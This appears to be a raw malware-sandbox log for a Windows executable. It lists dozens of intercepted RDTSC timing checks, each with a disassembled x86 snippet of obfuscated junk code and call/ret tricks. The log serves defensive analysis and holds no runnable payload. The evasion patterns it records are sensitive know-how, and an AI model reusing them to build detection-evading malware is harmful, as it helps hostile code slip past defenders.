Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1024F11 second address: 1024F18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1024F18 second address: 1024F1D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10255BA second address: 10255BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10255BE second address: 1025619 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB19901BD06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b and edi, 03265591h 0x00000011 push 00000000h 0x00000013 mov ebx, 0F83C836h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007FB19901BD08h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 00000018h 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 and edi, 362F207Bh 0x0000003a xchg eax, esi 0x0000003b jmp 00007FB19901BD0Fh 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 ja 00007FB19901BD08h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10265BE second address: 10265C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1027559 second address: 102755F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1026764 second address: 102676A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1027798 second address: 10277C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FB19901BD0Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 102676A second address: 1026803 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB19901BDE7h 0x00000008 jbe 00007FB19901BDD6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 jmp 00007FB19901BDE2h 0x00000019 push dword ptr fs:[00000000h] 0x00000020 push 00000000h 0x00000022 push eax 0x00000023 call 00007FB19901BDD8h 0x00000028 pop eax 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d add dword ptr [esp+04h], 00000019h 0x00000035 inc eax 0x00000036 push eax 0x00000037 ret 0x00000038 pop eax 0x00000039 ret 0x0000003a mov edi, 167DE1CAh 0x0000003f xor ebx, dword ptr [ebp+122D2B25h] 0x00000045 mov edi, dword ptr [ebp+122D2B0Dh] 0x0000004b mov dword ptr fs:[00000000h], esp 0x00000052 mov dword ptr [ebp+122D39DEh], edi 0x00000058 mov eax, dword ptr [ebp+122D0C95h] 0x0000005e mov edi, esi 0x00000060 push FFFFFFFFh 0x00000062 cld 0x00000063 nop 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007FB19901BDDDh 0x0000006b rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10295C2 second address: 10295D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB19901BD0Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10277C0 second address: 10277C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 102DD5F second address: 102DD63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 102DD63 second address: 102DD6D instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB19901BDD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 102DD6D second address: 102DDBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD16h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c sub edi, 71578181h 0x00000012 or dword ptr [ebp+122D3197h], esi 0x00000018 push 00000000h 0x0000001a jng 00007FB19901BD16h 0x00000020 jnc 00007FB19901BD10h 0x00000026 push 00000000h 0x00000028 mov dword ptr [ebp+12456274h], esi 0x0000002e xchg eax, esi 0x0000002f pushad 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 102DDBB second address: 102DDC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 102DDC1 second address: 102DDC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 102ED50 second address: 102ED9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 nop 0x00000007 call 00007FB19901BDE6h 0x0000000c call 00007FB19901BDE5h 0x00000011 mov bl, 8Dh 0x00000013 pop ebx 0x00000014 pop edi 0x00000015 push 00000000h 0x00000017 cld 0x00000018 push 00000000h 0x0000001a mov edi, dword ptr [ebp+122D1A2Ch] 0x00000020 xchg eax, esi 0x00000021 pushad 0x00000022 jng 00007FB19901BDDCh 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 102ED9B second address: 102EDA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 102A72C second address: 102A730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 102A730 second address: 102A73E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 102A87C second address: 102A891 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push edi 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 102A891 second address: 102A895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1030D3C second address: 1030D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB19901BDD6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1030D4B second address: 1030D4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1030D4F second address: 1030D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jbe 00007FB19901BDD6h 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1030D61 second address: 1030D67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 102CF08 second address: 102CF28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 jmp 00007FB19901BDE2h 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1031D8B second address: 1031DDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007FB19901BD08h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 mov edi, dword ptr [ebp+122D37F3h] 0x00000028 mov ebx, dword ptr [ebp+122D2DAEh] 0x0000002e push 00000000h 0x00000030 mov ebx, dword ptr [ebp+122D2C21h] 0x00000036 push 00000000h 0x00000038 and edi, dword ptr [ebp+124496F4h] 0x0000003e xchg eax, esi 0x0000003f js 00007FB19901BD14h 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1031DDD second address: 1031DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1031DE1 second address: 1031DF1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push esi 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1032CE4 second address: 1032CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1033AFE second address: 1033B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1033B02 second address: 1033B13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1033B13 second address: 1033B18 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1034A33 second address: 1034A78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov ebx, dword ptr [ebp+122D2E3Bh] 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 mov dword ptr [ebp+122D2D44h], ecx 0x0000001c mov dword ptr [ebp+122D31C6h], eax 0x00000022 xchg eax, esi 0x00000023 jp 00007FB19901BDE4h 0x00000029 push eax 0x0000002a push edi 0x0000002b push eax 0x0000002c push edx 0x0000002d push edi 0x0000002e pop edi 0x0000002f rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 102FEDC second address: 102FEF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1031FCB second address: 1031FE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB19901BDE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 103CAFC second address: 103CB0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB19901BD0Ch 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 103CB0D second address: 103CB19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FB19901BDD6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 103CB19 second address: 103CB1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 103CB1D second address: 103CB34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDE3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FE108A second address: FE10A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FE10A5 second address: FE10CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BDDFh 0x00000007 jnp 00007FB19901BDEAh 0x0000000d jmp 00007FB19901BDDEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 103C1D7 second address: 103C1E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push edx 0x00000008 pop edx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 103C1E8 second address: 103C211 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB19901BDDFh 0x00000009 jmp 00007FB19901BDDBh 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 js 00007FB19901BDD6h 0x00000018 pop eax 0x00000019 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 103C211 second address: 103C217 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 103C4F6 second address: 103C500 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB19901BDD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 103C653 second address: 103C66E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB19901BD15h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 103C66E second address: 103C689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB19901BDE7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10409DF second address: 10409E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FB19901BD06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1040A6E second address: 1040AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edi 0x00000007 jmp 00007FB19901BDE2h 0x0000000c pop edi 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jmp 00007FB19901BDE5h 0x00000016 mov eax, dword ptr [eax] 0x00000018 pushad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1040CBC second address: 1040CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB19901BD0Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1040CD4 second address: 1040CD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1040CD8 second address: 1040D22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 jmp 00007FB19901BD13h 0x0000000e pop ecx 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jo 00007FB19901BD19h 0x00000019 jl 00007FB19901BD13h 0x0000001f jmp 00007FB19901BD0Dh 0x00000024 mov eax, dword ptr [eax] 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FB19901BD0Ch 0x0000002d rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1040D22 second address: 1040D3C instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB19901BDD8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007FB19901BDDCh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1040D3C second address: 1040D40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1040D40 second address: 1040D46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10470E2 second address: 1047105 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB19901BD0Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB19901BD13h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1047105 second address: 1047109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1047109 second address: 104710D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 104745D second address: 1047467 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB19901BDD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 104771F second address: 1047725 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10479B7 second address: 10479BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10479BD second address: 10479C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10479C2 second address: 10479DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB19901BDE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10479DD second address: 1047A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FB19901BD06h 0x0000000a jmp 00007FB19901BD11h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007FB19901BD06h 0x00000018 jns 00007FB19901BD06h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: FDC0D3 second address: FDC0F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FB19901BDE0h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 104C0EB second address: 104C100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB19901BD0Ch 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 104C100 second address: 104C104 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 104C104 second address: 104C11B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB19901BD11h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 104C667 second address: 104C66F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 104BC64 second address: 104BC85 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB19901BD06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FB19901BD13h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 104C9BE second address: 104C9E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB19901BDDBh 0x00000009 je 00007FB19901BDD6h 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jp 00007FB19901BDD6h 0x00000020 push eax 0x00000021 pop eax 0x00000022 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 104C9E6 second address: 104C9EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 104CC5A second address: 104CC5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 104CEEE second address: 104CEF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1051327 second address: 105134A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007FB19901BDD6h 0x0000000d jmp 00007FB19901BDE6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1051506 second address: 105150F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 105150F second address: 1051513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1051513 second address: 1051553 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB19901BD06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d pushad 0x0000000e jmp 00007FB19901BD10h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push edx 0x00000017 pop edx 0x00000018 jnc 00007FB19901BD06h 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FB19901BD14h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 1051553 second address: 1051557 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10516B9 second address: 10516BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 10516BD second address: 10516C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FQSn6sSfgS.exe RDTSC instruction interceptor: First address: 105198A second address: 105198E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
